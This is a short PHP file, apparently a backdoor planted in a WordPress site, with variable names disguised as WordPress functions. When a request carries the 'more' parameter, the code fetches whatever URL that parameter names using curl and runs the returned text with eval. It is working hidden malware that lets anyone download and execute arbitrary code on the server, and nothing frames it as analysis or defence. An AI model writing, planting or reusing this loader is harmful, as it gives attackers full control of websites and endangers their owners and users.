<?php
if (isset($_GET['more'])) {
$wp_enqueue_script_uos = $_GET['more'];
if ($the_ID_yl = curl_init()) {
curl_setopt($the_ID_yl, CURLOPT_URL, $wp_enqueue_script_uos);
curl_setopt($the_ID_yl, CURLOPT_RETURNTRANSFER, true);
eval(curl_exec($the_ID_yl));
curl_close($the_ID_yl);
exit;
}
}